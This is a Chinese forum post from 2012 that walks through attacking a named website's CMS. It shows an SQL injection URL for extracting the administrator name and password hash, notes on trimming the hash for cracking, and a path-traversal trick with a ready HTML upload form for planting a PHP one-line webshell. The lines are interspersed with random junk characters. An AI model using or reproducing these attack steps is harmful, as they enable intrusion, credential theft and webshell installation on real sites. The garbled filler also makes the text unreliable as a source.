①注入漏洞。
" }) h; \9 W4 H4 x5 g+ j% z这站 http://www.political-security.com/, `( s; t& H/ W4 g+ N8 v, b% X" v& S
首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,
+ K9 y6 R( j! U- c! n+ ^! [www.political-security.com/data/mysql_error_trace.inc 爆后台
9 n2 q9 X) ]6 d/ \7 E# V然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。' z' w0 |( g$ y5 V1 n, l) B
然后写上语句
& c9 y0 b# A* ~% v0 t! D查看管理员帐号
$ S. S4 ~. ?" \. Ohttp://www.political-security.co ... &membergroup=@`# y: G+ J- F5 X# {
: M' } ? Q- @0 [% J! ~: a$ ]admin 9 E+ j& }1 q. |
3 g! x* K& M& P6 G7 c" ]$ n& s+ F
查看管理员密码
- v+ k+ s" i& }! t7 @ http://www.political-security.co ... &membergroup=@`) i2 n6 J+ c8 l+ }3 m
J/ P5 n' s# h% S' J8d29b1ef9f8c5a5af429
! I# i7 y) j9 k% i, h7 m
' y$ N+ m7 Y& p8 s7 u. f5 D( [ B查看管理员密码1 [# ^+ b5 R/ p1 m" e" W( `9 Z
% \; F$ ^. K5 X/ D; b' X2 N! E+ |
得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5
; H4 |5 x" P0 H% A2 x, w" {4 i' H! y. K
8d2( ~+ Y3 q) S8 c6 ]+ q7 X
9b1ef9f8c5a5af425 [- h: L, U% f! n% y
9" |) D! k. M$ h$ \6 t. T* a
2 ^$ S/ k/ y- G4 l# X. H* u+ Zcmd5没解出来 只好测试第二个方法# I, I! L \* T* ]7 ?+ L. [
( w$ \, F$ Y: o" T# `7 I5 i
. g! w" H1 F# x& z' f# R' L②上传漏洞:
5 W3 [7 d& N- B: [3 g/ v+ p+ Y
3 f. {" I, Y# P" ^" P, C+ w3 l# C只要登陆会员中心,然后访问页面链接8 C- }, s0 V* W# X7 q1 N- V
“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”
) h* S, ?4 @, {+ U
6 c# a, {. G. J5 F) E如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”
9 W! f) Z9 H1 N: m# O
. E. w6 d! N/ O: X于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm
' V" e2 w P9 ]. h/ C0 j) p* r7 R+ e3 ` R/ [' Z% I; t a4 ]
<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>
5 t+ g" C4 Y1 P7 h6 j或者$ H2 y6 P# I+ Y# f
即可上传成功 |
发表于 2012-9-13 10:56:59
收藏
支持
反对